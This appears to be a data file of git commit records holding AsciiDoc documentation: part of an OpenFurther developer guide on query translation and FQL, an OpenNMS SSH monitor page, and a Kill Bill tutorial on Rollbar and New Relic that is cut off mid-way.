translated:\n\nProp_Name = ATTR_VALUE_TRANS_FUNC\n\nProp_Val = CUSTOM^fqt:yearFromDateTime\n\n\n\n\n\n.Part Two (Result Translations)\nThere are Normal Scenarios and Special Scenarios for Result Translations.\n\n.Normal Scenario 1) Specify the RESULT_PATH for each External Asset. You can include the XPath Predicate when necessary. The XPath Value begins under the rootObject of the External data model. For example, if the rootObject is Person, and you are trying to get to the gender, use \u2018\/gender\u2019 as the XPath value. The rootObject \u2018\/Person\u2019 part is not needed.\n\nProp_Name = RESULT_PATH\n\nProp_Val = {XPath Value to the External XML Node}\n\nFor example, Prop_Val =\n\/personAttributes\/personAttribute\/value[..\/personAttributeType=1]\n\n.Normal Scenario 2) Specify the External Root Object\u2019s ID Attribute.\n\nGenerally, this property is set for the {FURTHER.PERSON} to {EXTERNAL.PERSON} association.\n\nNote that we may want to rename this property name to EXT_PERSON_ID_ATTR in the future, since we may want to support multiple root objects in the future.\n\nProp_Name = EXT_ROOT_ID_ATTR\n\nProp_Val = {rootObject ID Attribute}\n\nFor example, Prop_Val = personId\n\nBe sure to have a One-To-One Mapping for the rootObject. 
If a One-To-Many mapping is really necessary, specify an additional property with:\n\nProp_Name = RESULT_SELECTION\n\nProp_Val = pickMe\n\nOr you can disable the unnecessary association by setting the asset_assoc.enabled field to \u2018N\u2019.\n\n.Special Scenario 3) To skip an attribute from Result Translation, set the RESULT_PATH property value to \u201cS\u201d (Skip).\nA Result Attribute will automatically be skipped if it has no value, or if the result tag does not exist.\n\nProp_Name = RESULT_PATH\n\nProp_Val = S\n\n.Part Three (Query & Result Translations)\nBy default, when calling DTS (Apelon Terminology Server), we get the exact match of the external 'Local Code' value.\nHowever, we can override this default with an association property like this:\n\nIf we want to get the value of DTS property type 'Value_Of_Race'\n\nProp_Name = EXTERNAL_PROPERTY_NAME\n\nProp_Val = Value_Of_Race\n\nOR\n\nIf we want to get the value of DTS property type 'Domain'\n\nProp_Name = EXTERNAL_PROPERTY_NAME\n\nProp_Val = Domain\n\nThis will create a DTS call like this:\n\nhttp:\/\/dev-esb.further.utah.edu:9000\/dts\/rest\/translate\/30\/Code%20in%20Source\/439401001\/32776\/Domain?view=HUMAN\n\n\n\nData Source Adapters\n--------------------\nData source adapters are the pieces of OpenFurther which interact with a data source. Loosely speaking, data source adapters are like plugins. They are simply modules that listen for incoming query requests and act upon them, following a specified protocol. Any programming language that can send messages to and receive messages from a JMS topic, as well as process XML, can be used to program a data source adapter. We do, however, recommend using the existing framework.\n\nData source adapters follow a standard protocol:\n\n* initialization\n* query translation\n* execution\n* result translation\n\nAt the end of each step, status messages are sent to a JMS topic. Statuses include the current state of the query and how many results have been processed at that time.\n\nLikewise, every query can be in one of the following states:\n\n* QUEUED\n* STARTED\n* EXECUTING\n* STOPPED\n* FAILED\n\nJava Data Source Adapter Framework\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nOpenFurther provides several data source adapters, supported by the community, that run against well known data models. These adapters can be used by downloading the existing adapter, customizing the configuration, compiling them for execution, and installing them into the system.\n\nAdditionally, OpenFurther is flexible and also provides the ability to implement your own custom adapter. Reasons for doing this include but are not limited to:\n\n* A custom data model\n* A custom interface for accessing the data, such as a web service.\n* Custom processing required beyond the standard processing steps within an adapter.\n\nImplementing a custom data source adapter\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nWe recommend downloading the source code of an existing data source adapter to use as a reference and starting point for your custom data source adapter. Existing data source adapters can be found here https:\/\/github.com\/openfurther\/further-open-datasources\n\nQuery Processors\n^^^^^^^^^^^^^^^^\nData source adapters follow a chain-of-responsibility pattern. The query is passed through several processors and each processor is given an opportunity to act on or ignore the data produced by the previous processors. 
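Before looking at the default processors, the following sketch illustrates the chain-of-responsibility idea in plain Java. It is deliberately simplified: the QueryProcessor interface and QueryContext class here are hypothetical stand-ins rather than the actual OpenFurther types, whose real definitions live in the adapter source linked above.

.Chain-of-responsibility sketch (hypothetical types)
[source,java,numbered]
----
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Hypothetical shared state that is passed along the chain
class QueryContext
{
	final Map<String, Object> attributes = new HashMap<>();
}

// Hypothetical processor contract: each link may act on or ignore the context
interface QueryProcessor
{
	void process(QueryContext context);
}

public class ProcessorChainSketch
{
	public static void main(final String[] args)
	{
		// One stand-in processor per protocol step
		final List<QueryProcessor> chain = List.of(
				context -> context.attributes.put("initialized", Boolean.TRUE),
				context -> context.attributes.put("translatedQuery", "..."),
				context -> context.attributes.put("rawResults", "..."),
				context -> context.attributes.put("translatedResults", "..."));

		final QueryContext context = new QueryContext();
		for (final QueryProcessor processor : chain)
		{
			// Each processor sees the output of all previous processors
			processor.process(context);
		}
		System.out.println(context.attributes.keySet());
	}
}
----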
\n\nThere are several default query processors for each step within data source adaption.\n\nEach Query Processor has a Delegate implementation that contains the business logic to implement each processor.\n\n* QueryTranslatorQp\n** Delegate: QueryTranslatorXQueryImpl - implements query translator by utilizing an XQuery program which in turns utilizes metadata within the MDR. Xquery files are stored within the MDR and can be referenced by path. The path to the MDR file is given as part of initialization.\n* QueryExecutorQp\n** Delegate: ExecutorQuestImpl \u2013 implements query execution based on the data source type specified by DS_TYPE within initialization. Currently, only database data sources are well supported, however, web services data sources can be implemented with additional effort.\n* ResultTranslatorQp\n** Delegate: ResultTranslatorXqueryImpl \u2013 implements results translation by applying an xquery file to the marshaled XML results. Xquery files are stored within the MDR and can be referenced by path. The path to the MDR file is given as part of initialization.\n* FinalizerQp\n** Delegate: FinalizerMock \u2013 does nothing but finish the query\n\nFederated Query Engine (FQE)\n----------------------------\n\nFederated Query Language (FQL)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nAll queries sent to OpenFurther are constructed using FQL. FQL is an object oriented query language expressed in XML that is largely based off of the http:\/\/docs.jboss.org\/hibernate\/orm\/3.3\/reference\/en\/html\/querycriteria.html[Hibernate Criteria API]. \n\nRoot Object\n^^^^^^^^^^^\nFQL queries are constructed against a given data model, for instance, the OpenFurther model. Every query is centered around a given object. This is called the root object. For instance, when querying for persons with a particular diagnosis, the root object would be Person.\n\nYou declare the root object as an attribute of the <query> tag\n\n.Declaring a root object\n[source,xml,numbered]\n----\n<query xmlns=\"http:\/\/further.utah.edu\/core\/query\" \n\txmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" \n\trootObject=\"Person\">\n\t....\n<\/query>\n----\n\nQuery Attributes\n^^^^^^^^^^^^^^^^\nFQL query attributes are simply the field names (instance variables) of the root object you're querying against. 
If you're familiar with SQL, you can think of query attributes like database columns.\n\nFor instance, in the following Person class, 'compositeId', 'administrativeGenderNamespaceId', and 'administrativeGender' are all query attributes that can be used in FQL.\n\n.Java root object fields\n[source,java,numbered]\n----\npublic class Person implements PersistentEntity<PersonId>\n{\n\n\t@Column(name = \"FPERSON_COMPOSITE_ID\")\n\tprivate String compositeId;\n\n\t@Column(name = \"administrative_gender_nmspc_id\")\n\tprivate Long administrativeGenderNamespaceId;\n\n\t@Column(name = \"administrative_gender_cid\")\n\tprivate String administrativeGender;\n\n\t....\n\n}\n----\n\nFQL Reference\n^^^^^^^^^^^^^\n\nSimple Expressions\n++++++++++++++++++\n\n.EQ - Equals\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>EQ<\/parameter>\n <parameter>DiagnosisGrouping.codeSequenceNumber<\/parameter>\n <parameter>766.2<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.NE - Not Equals\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>NE<\/parameter>\n <parameter>Lab.value<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.GT - Greater Than\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>GT<\/parameter>\n <parameter>Lab.reading<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.LT - Less Than\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>LT<\/parameter>\n <parameter>Lab.reading<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.LE - Less Than or Equal\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>LE<\/parameter>\n <parameter>Lab.reading<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.GE - Greater Than or Equal\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>GE<\/parameter>\n <parameter>Lab.reading<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\nUnary Expressions\n+++++++++++++++++\n\n.NOT - Negation\n[source,xml,numbered]\n----\n<criteria>\n <searchType>NOT<\/searchType>\n <parameters\/>\n <criteria>\n ...\n <\/criteria>\n<\/criteria>\n----\n\nMultinary Expressions\n+++++++++++++++++++++\n\n.Conjunction - a conjunction between two or more expressions\n[source,xml,numbered]\n----\n<criteria>\n <searchType>CONJUNCTION<\/searchType>\n <parameters\/>\n <criteria>\n ...\n <\/criteria>\n <criteria>\n ...\n <\/criteria>\n <criteria>\n ...\n <\/criteria>\n<\/criteria>\n----\n\n.Disjunction - a disjunction between two or more expressions\n[source,xml,numbered]\n----\n<criteria>\n <searchType>DISJUNCTION<\/searchType>\n <parameters\/>\n <criteria>\n ...\n <\/criteria>\n <criteria>\n ...\n <\/criteria>\n <criteria>\n ...\n <\/criteria>\n<\/criteria>\n----\n\nInterval Expressions\n++++++++++++++++++++\n\n.Between\n[source,xml,numbered]\n----\n<criteria>\n <searchType>BETWEEN<\/searchType>\n <parameters>\n <parameter>Observation.observationValue<\/parameter>\n <parameter>1<\/parameter>\n <parameter>2<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\nString Expressions\n++++++++++++++++++\n\n.Like - Contains the value\n[source,xml,numbered]\n----\n<criteria>\n <searchType>LIKE<\/searchType>\n 
<parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">250<\/parameter>\n <\/parameters>\n <options>\n <matchType>CONTAINS<\/matchType>\n <ignoreCase>false<\/ignoreCase>\n <\/options>\n<\/criteria>\n----\n\n.Like - Exact match of the value\n[source,xml,numbered]\n----\n<criteria>\n <searchType>LIKE<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">250<\/parameter>\n <\/parameters>\n <options>\n <matchType>EXACT<\/matchType>\n <ignoreCase>false<\/ignoreCase>\n <\/options>\n<\/criteria>\n----\n\n.Like - Value starts with\n[source,xml,numbered]\n----\n<criteria>\n <searchType>LIKE<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">250<\/parameter>\n <\/parameters>\n <options>\n <matchType>STARTS_WITH<\/matchType>\n <ignoreCase>false<\/ignoreCase>\n <\/options>\n<\/criteria>\n----\n\n.Like - Value ends with\n[source,xml,numbered]\n----\n<criteria>\n <searchType>LIKE<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">250<\/parameter>\n <\/parameters>\n <options>\n <matchType>ENDS_WITH<\/matchType>\n <ignoreCase>false<\/ignoreCase>\n <\/options>\n<\/criteria>\n----\n\nCollection Expressions\n++++++++++++++++++++++\n\n.In - Value(s) is within set\n[source,xml,numbered]\n----\n<criteria>\n <searchType>IN<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">401.1<\/parameter>\n <parameter xsi:type=\"xs:string\">401.2<\/parameter>\n <parameter xsi:type=\"xs:string\">401.3<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\nFQL to Hibernate Criteria\n^^^^^^^^^^^^^^^^^^^^^^^^^\nSince FQL is largely based on Hibernate Criteria objects, it's possible to convert an FQL query into Hibernate Criteria that will then allow Hibernate to convert that into SQL.\n\nConverting an FQL is very simple.\n\n1. Using JAXB, unmarshal the XML into a SearchQueryTo.\n2. Locate the root hibernate entity class (typically Person or Patient) <Root Entity>\n3. Call the QueryBuilder class like below\n\n.Converting FQL to Hibernate Criteria\n[source,java,numbered]\n----\nfinal GenericCriteria hibernateCriteria = \n\tQueryBuilderHibernateImpl.convert(CriteriaType.CRITERIA, <Root \n\t\tEntity>.class, sessionFactory, searchQuery);\n----\n\nFQL Schema\n^^^^^^^^^^\n.FQL Schema\nimage::images\/figures\/search_query_xsd.png[]\n\nTechnologies\n------------\nOpenFurther is built on a number of Open Source technologies\n\n* Languages\n** Java\n** Groovy \n** Bash\n** Python\n* Development Tools\n** Maven 3\n** SonaType Nexus\n** Eclipse\n** Git\n** JIRA\n** Bamboo\n* Service Frameworks\n** Spring\n** Apache Commons\n** Apache CXF\n** Apache Camel\n* Application Servers\n** Apache ServiceMix\n* Testing\n** JUnit\n** Spock\n\nInstalling\n----------\nOpenFurther is provided as a VM image for download at this time. The VM can be used as a reference for installation, typically splitting out each Linux user as an individual server.\n\nTODO: Expand this section with detailed instructions for installing on Linux and Windows\n\nDemo System Administration\n---------------------------\nOpenFurther utilizes a number of different servers to run. The following instructions pertain to the demo VM of OpenFurther that is available for download. 
All scripts used for starting and stopping services are available within the further-open-extras repository on GitHub.\n\nTIP: The demo version contains all of the servers as individual Linux users.\n\nApache HTTP Server\n~~~~~~~~~~~~~~~~~~\nThe Apache HTTP server runs on port 80 and port 443. As root, run the following\n\n----\nservice httpd start|stop\n----\n\nIn-Memory Database Server\n~~~~~~~~~~~~~~~~~~~~~~~~~\nThe HSQLDB server runs on port 9001. As root, run the following\n\n----\n\/etc\/init.d\/hsqldb start|stop\n----\n\nCore Database Server\n~~~~~~~~~~~~~~~~~~~~\nNOTE: While our architecture supports different database, we've currently only tested OpenFurther on Oracle and Oracle XE\n\n----\nservice oracle-xe start|stop\n----\n\nTerminology Server\n~~~~~~~~~~~~~~~~~~\nThe terminology server (Apelon DTS) runs on port 16666 (Requires that the Oracle Database Server has started). As root, run the following\n\n----\nsu - dtsdemo\ndts-auto start|stop\n----\n\nEnterprise Service Bus (ESB)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nOpenFurther utilizes an ESB (Apache ServiceMix) to run application code. The ESB requires that the in-memory database, core database, and terminology server are already started. As root, run the following\n\n----\nsu - esb\nstart_esb\n----\n\nTo stop the ESB:\n\n----\nsu - esb\nesbl\nfurther@localhost\u2019s password:\nfurther@local> shutdown\nConfirm: shutdown instance local (yes\/no):\n----\n\nLogging Locations\n~~~~~~~~~~~~~~~~~\n\nApache HTTP Server\n^^^^^^^^^^^^^^^^^^\nThe Apache HTTP server logs are located in \/var\/www\/httpd\/\n\nIn-Memory Database Server\n^^^^^^^^^^^^^^^^^^^^^^^^^\nThe HSQLDB is currently not configured for logging\n\nCore Database Server\n^^^^^^^^^^^^^^^^^^^^\nThe Oracle XE database server is currently not configured for logging\n\nTerminology Server\n^^^^^^^^^^^^^^^^^^\nThe Apelon DTS server logs in \/home\/demodts\/Apelon_DTS\/dts\/bin\/logs\n\nEnterprise Service Bus (ESB)\n^^^^^^^^^^^^^^^^^^^^^^^^^^^\nServiceMix ESB logs in \/home\/esb\/servicemix\/data\/log\n\nOpenFurther-i2b2\n^^^^^^^^^^^^^^^^\nFURTHeR-i2b2 logs in 2 different locations\n\n* jboss: \/home\/i2b2\/jboss\/server\/default\/logs\n* tomcat: \/home\/i2b2\/tomcat\/logs\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"be4675528861f8285c646492f2c57ea223906270","subject":"NMS-6687: some German Ordnungswahn","message":"NMS-6687: some German Ordnungswahn\n\nCyrille\n","repos":"roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,tdefilip\/opennms,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,aihua\/opennms,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/SshMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/SshMonitor.adoc","new_contents":"=== SshMonitor\n\nThe SSH monitor tests the availability of a SSH service. \nDuring the poll an attempt is made to connect on the specified port. 
If the connection request is successful, then the service is considered up.\nOptionally, the banner line generated by the service may be parsed and compared against a pattern before the service is considered up.\n\n==== Monitor facts\n\n[options=\"autowidth\"]\n|===\n| Class Name | `org.opennms.netmgt.poller.monitors.SshMonitor`\n| Remote Enabled | true\n|===\n\n==== Configuration and Usage\n\n.Monitor specific parameters for the SshMonitor\n[options=\"header, autowidth\"]\n|===\n| Parameter | Description | Required | Default value\n| `banner` | Regular expression to be matched against the service's banner. | optional | `-`\n| `client-banner` | The client banner that OpenNMS will use to identify itself on the service. | optional | `SSH-1.99-OpenNMS_1.5`\n| `match` | Regular expression to be matched against the service's banner. +\n Deprecated, please use the `banner` parameter instead. +\n Note that this parameter takes precedence over the `banner` parameter, though. | optional | `-`\n| `port` | TCP port to which SSH connection shall be tried. | optional | `22`\n| `retry` | Number of attempts to establish the SSH connection. | optional | `0`\n| `timeout` | Timeout in milliseconds for SSH connection establishment. | optional | `3000`\n|===\n\n==== Examples\n\n[source, xml]\n----\n<service name=\"SSH\" interval=\"300000\" user-defined=\"false\" status=\"on\">\n <parameter key=\"retry\" value=\"1\"\/>\n <parameter key=\"banner\" value=\"SSH\"\/>\n <parameter key=\"client-banner\" value=\"OpenNMS poller\"\/>\n <parameter key=\"timeout\" value=\"5000\"\/>\n <parameter key=\"rrd-repository\" value=\"\/var\/lib\/opennms\/rrd\/response\"\/>\n <parameter key=\"rrd-base-name\" value=\"ssh\"\/>\n <parameter key=\"ds-name\" value=\"ssh\"\/>\n<\/service>\n<monitor service=\"SSH\" class-name=\"org.opennms.netmgt.poller.monitors.SshMonitor\"\/>\n----\n","old_contents":"=== SshMonitor\n\nThe SSH monitor tests the availability of a SSH service. +\nDuring the poll an attempt is made to connect on the specified port. If the connection request is successful, then the service is considered up. +\nOptionally, the banner line generated by the service may be parsed and compared against a pattern before the service is considered up.\n\n==== Monitor facts\n\n[options=\"autowidth\"]\n|===\n| Class Name | `org.opennms.netmgt.poller.monitors.SshMonitor`\n| Remote Enabled | true\n|===\n\n==== Configuration and Usage\n\n.Monitor specific parameters for the SshMonitor\n[options=\"header, autowidth\"]\n|===\n| Parameter | Description | Required | Default value\n| `banner` | Regular expression to be matched against the service's banner. | optional | `-`\n| `client-banner` | The client banner that OpenNMS will use to identify itself on the service. | optional | `SSH-1.99-OpenNMS_1.5`\n| `match` | Regular expression to be matched against the service's banner. +\n Deprecated, please use the `banner` parameter instead. +\n Note that this parameter takes precedence over the `banner` parameter, though. | optional | `-`\n| `port` | TCP port to which SSH connection shall be tried. | optional | `22`\n| `retry` | Number of attempts to establish the SSH connection. | optional | `0`\n| `timeout` | Timeout in milliseconds for SSH connection establishment.
| optional | `3000`\n|===\n\n==== Examples\n\n[source, xml]\n----\n<service name=\"SSH\" interval=\"300000\" user-defined=\"false\" status=\"on\">\n  <parameter key=\"retry\" value=\"1\"\/>\n  <parameter key=\"banner\" value=\"SSH\"\/>\n  <parameter key=\"client-banner\" value=\"OpenNMS poller\"\/>\n  <parameter key=\"timeout\" value=\"5000\"\/>\n  <parameter key=\"rrd-repository\" value=\"\/var\/lib\/opennms\/rrd\/response\"\/>\n  <parameter key=\"rrd-base-name\" value=\"ssh\"\/>\n  <parameter key=\"ds-name\" value=\"ssh\"\/>\n<\/service>\n<monitor service=\"SSH\" class-name=\"org.opennms.netmgt.poller.monitors.SshMonitor\"\/>\n----\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"65529b4a46a6e0a17ad9451e03caf45f53e5a762","subject":"Beginning document for Rollbar","message":"Beginning document for Rollbar","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/metrics-rollbar.adoc","new_file":"userguide\/tutorials\/metrics-rollbar.adoc","new_contents":"= Error Tracking with Rollbar\n\n:imagesdir: https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\n\n\n== Single-Tier and Multi-Tier Implementations\n\nError tracking is an important part of managing your Kill\nBill system. When errors occur, whether due to system bugs or user mistakes, error tracking enables you to analyze what went wrong and develop ways to avoid similar errors in the future.\n\nYour application may log errors along with many other events, but log files are often huge and it is not easy to extract the information needed for error analysis. Several third-party tools are available to help with this task. One popular tool is https:\/\/rollbar.com\/[Rollbar]. This\npackage offers error extraction and analysis at very low cost for your Kill Bill implementation.\n\nRollbar can be integrated with several types of Kill Bill installations. In this guide we discuss the use of Rollbar to track errors produced\nby two types of implementations on Amazon Web Services (AWS):\nsingle-tier and multi-tier. With the latest Amazon Machine Image (AMI)\nfor Kill Bill, it is very easy to process the Kill Bill logs using\nRollbar and work with them in the way that best suits your needs.\n\n== Check Your Kill Bill Version\n\nWe assume that you have a working Kill Bill implementation running on\nAWS, using either the\nhttps:\/\/docs.killbill.io\/latest\/aws-singletier.html[Single Tier] or\nhttps:\/\/docs.killbill.io\/latest\/aws-multitier.html[Multitier]\ninstallation options. The single-tier option runs Kill Bill, Kaui, the\nMariaDB database, and the nginx load balancer on a single AWS EC2\ninstance. This is suitable for quick deployment and for testing and\ndevelopment. The multi-tier option runs Kill Bill and Kaui on two or more\nseparate EC2 instances, and uses an AWS RDS database manager along with\nan AWS load balancer. This is an attractive option for many production\nuses.\n\nYou should be running Kill Bill version 2021.9 or later. This version\ncan be configured to provide its full collection of Kill Bill metrics to\nNew Relic (and several other analysis tools). If you open the Kill Bill\nadmin page in your browser, it should show that you are\nrunning the \"Kill Bill Premium edition\":\n\nimage::metrics-kb-admin.png[align=center]\n\n\nIf you see this page you are ready to go. 
If not, you should upgrade\nyour installation.\n\nWhile you are on this page, if you want to see all the metrics that Kill\nBill has to offer, just add the path `\/1.0\/metrics` to the URL. Have fun!\nIf you find these hard to understand, though, maybe New Relic can help.\n\n== Set Up New Relic\n\nYou may already be familiar with New Relic. If not, this section will\nexplain how to get started.\n\nFirst, go to the https:\/\/www.newrelic.com\/[New Relic website]. New Relic\noffers a free account as long as your usage does not exceed certain limits. Provide a name and email address to sign up.\n\nYou should see the New Relic main page. To get back to this page at a future time you can click the words *New Relic One* in the upper left corner.\n\nTo set up New Relic to manage the metrics available from Kill Bill, there\nare just two steps: (1) install the New Relic agent in Kill Bill, and (2)\nedit a configuration file to enable the transfer of the complete Kill Bill metrics.\n\n== Install the Agent\n\nThe first step in integrating an analysis tool (like New Relic) and a\nsource of data to analyze (like Kill Bill) is to set up a means to get\nthe source to send its data to the analyzer. New Relic does this by\ninstalling the *New Relic Agent* in the system producing the data.\n\n1. In the main New Relic page, select the button labeled *Add Some Data*. If this button does not appear, select *+ Add More Data* in the upper right corner. \n2. An overlay pane should appear. At the top of this pane select *Guided Install*.\n3. The next pane is headed *Installation Plan*. Make sure the *Auto-Discovery* tab is selected, then choose *Linux*.\n4. The next pane summarizes what you have selected. Click on *Begin Installation*. You will see the following page:\n\nimage::metrics-newrelic-installation.png[align=center]\n\n[start=5]\n. In the box containing the install command, click *Copy Command*. The command will be copied to your clipboard.\n\n[NOTE]\nThis command includes the API key assigned to you by\nNew Relic. This authorizes the agent to do its job. This is your *user* API Key, and should not be confused with the key you will use in the next step.\n\n[start=6]\n. To install the agent: \n\n.. Log in to your EC2 instance. \n.. Paste the saved install command into the Ubuntu command line. \n.. Press Enter. The installation should begin.\n\nYou will be presented with a list of options to install, as shown below. An additional option, Infrastructure Agent, is always installed.\n\n[start=7]\n. Press Enter to select all of the options.\n\nimage::metrics-newrelic-options.png[align=center]\n\n\nYou will be presented with several questions, including default answers.\n\n[start=8]\n. Press Enter after each question to select the defaults.\n\nFinally, you will be asked for the MySQL password.\n\n[start=9]\n. Type `root`.\n\nIf all goes well, each installation should report `success`.\n\n\n[NOTE]\n*Note:* If you are using the multi-tier installation, you will have multiple EC2\ninstances. The agent should be installed separately for each one.\n\n== Test the Installation\n\n. Return to the New Relic main page. \n. Select *Browse Data* from the top menu. \n. Select *Metrics* from the dropdown.\n\nYou should see a\nlong list of metrics! These are coming from your instances, but they\nonly describe the Ubuntu environment itself. You do not yet have the\nKill Bill metrics. 
To fix this, proceed to the next section.\n\n== Set Up the Authorization\n\nTo authorize the sending of the Kill Bill metrics, it is necessary to\nedit two lines in this file:\n\n ```\n \/var\/lib\/tomcat\/bin\/setenv2.sh\n ```\n\nThis file contains configuration information for `tomcat`, which manages the\nKill Bill web applications.\n\nThis is a small file. The two lines to be edited are:\n\n```\n-Dcom.killbill.newrelic.enable=false\n-Dcom.killbill.newrelic.apiKey=\n```\n\nThese should be changed to:\n\n```\n-Dcom.killbill.newrelic.enable=true\n-Dcom.killbill.newrelic.apiKey=Your-API-Key\n```\n\nThe API key to be added is called the *Insights Insert Key.* This is *not* the same as the user API Key contained in the command you\nused to install the agent.\n\nTo find the Insights Insert Key:\n\n1. Close any overlay panes on the New Relic page by clicking on the `X` in the upper right corner.\n2. Click the symbol at the far upper right to open your account menu, then select *API keys*.\n3. On the page that appears, select *Insights Insert keys* at the lower right.\n4. In the *Insert Keys* column on the left, under the word *key* at the bottom, click *Show*.\n5. Manually copy the key to your clipboard, then paste it into the configuration file.\n\nAfter editing the file, go to your AWS EC2 dashboard and *reboot the\ninstance* so the new configuration file will be read. If you have more\nthan one instance, follow the same procedure for each one.\n\nNow return to the *Metrics\/Summary* page. After a short delay, you\nshould see a lot more metrics; well over 1,000 in your list.\n\nCongratulations. Your New Relic integration is complete!\n\n== Using New Relic\n\nThe New Relic site has lots of https:\/\/docs.newrelic.com\/docs\/[documentation], so we won't\nrepeat any of that here. We will just suggest a few quick steps to get\nstarted:\n\n1. Close any overlay panes on the New Relic page by clicking on the `X` in the upper right corner.\n2. Select *Browse Data* in the menu and *Metrics* in the submenu. A list of available metrics will appear on the left.\n3. Select some metrics to see the graph (chart) they produce. Identify the ones you would like to see together in a dashboard.\n4. To create a dashboard, close the metrics page, select *Dashboards* in the menu, and click *+ Create a Dashboard*.\n5. Select *Create New Dashboard*, give it a name, and click *Create*.\n\nYou can add charts to your dashboard for any metrics you choose. The charts can be edited, deleted, and rearranged. Your dashboard will appear under the *Dashboards* menu item. Have fun and good luck!\n\n\n\n\n","old_contents":"= Managing Metrics with New Relic\n\n:imagesdir: https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\n\n\n== Single-Tier and Multi-Tier Implementations\n\nMeasurements and metrics are an important part of managing your Kill\nBill system to be sure that performance is optimized and any problems\ncan be detected early. Kill Bill collects over 1,300 metrics to show you\nevery conceivable view of your system's behavior.\n\nSeveral third-party tools are available to manage and display metrics of\nthis type. One popular tool is https:\/\/www.newrelic.com\/[New Relic]. 
This\npackage offers a low-cost option to monitor and display whatever metrics\nyou may find useful from the Kill Bill collection, including metrics\nthat show the performance and resource use of Kill Bill and Kaui\nthemselves, and metrics describing the infrastructure on which these\nsystems run.\n\nNew Relic can be integrated with several types of Kill Bill installations. In this guide we discuss the use of New Relic to manage metrics produced\nby two types of implementations on Amazon Web Services (AWS):\nsingle-tier and multi-tier. With the latest Amazon Machine Image (AMI)\nfor Kill Bill, it is very easy to direct the Kill Bill metrics to\nNew Relic and work with them in the way that best suits your needs.\n\n== Check Your Kill Bill Version\n\nWe assume that you have a working Kill Bill implementation running on\nAWS, using either the\nhttps:\/\/docs.killbill.io\/latest\/aws-singletier.html[Single Tier] or\nhttps:\/\/docs.killbill.io\/latest\/aws-multitier.html[Multitier]\ninstallation options. The single-tier option runs Kill Bill, Kaui, the\nMariaDB database, and the nginx load balancer on a single AWS EC2\ninstance. This is suitable for quick deployment and for testing and\ndevelopment. The multi-tier option runs Kill Bill and Kaui on two or more\nseparate EC2 instances, and uses an AWS RDS database manager along with\nan AWS load balancer. This is an attractive option for many production\nuses.\n\nYou should be running Kill Bill version 2021.9 or later. This version\ncan be configured to provide its full collection of Kill Bill metrics to\nNew Relic (and several other analysis tools). If you open the Kill Bill\nadmin page in your browser, it should show that you are\nrunning the \"Kill Bill Premium edition\":\n\nimage::metrics-kb-admin.png[align=center]\n\n\nIf you see this page you are ready to go. If not, you should upgrade\nyour installation.\n\nWhile you are on this page, if you want to see all the metrics that Kill\nBill has to offer, just add the path `\/1.0\/metrics` to the URL. Have fun!\nIf you find these hard to understand, though, maybe New Relic can help.\n\n== Set Up New Relic\n\nYou may already be familiar with New Relic. If not, this section will\nexplain how to get started.\n\nFirst, go to the https:\/\/www.newrelic.com\/[New Relic website]. New Relic\noffers a free account as long as your usage does not exceed certain limits. Provide a 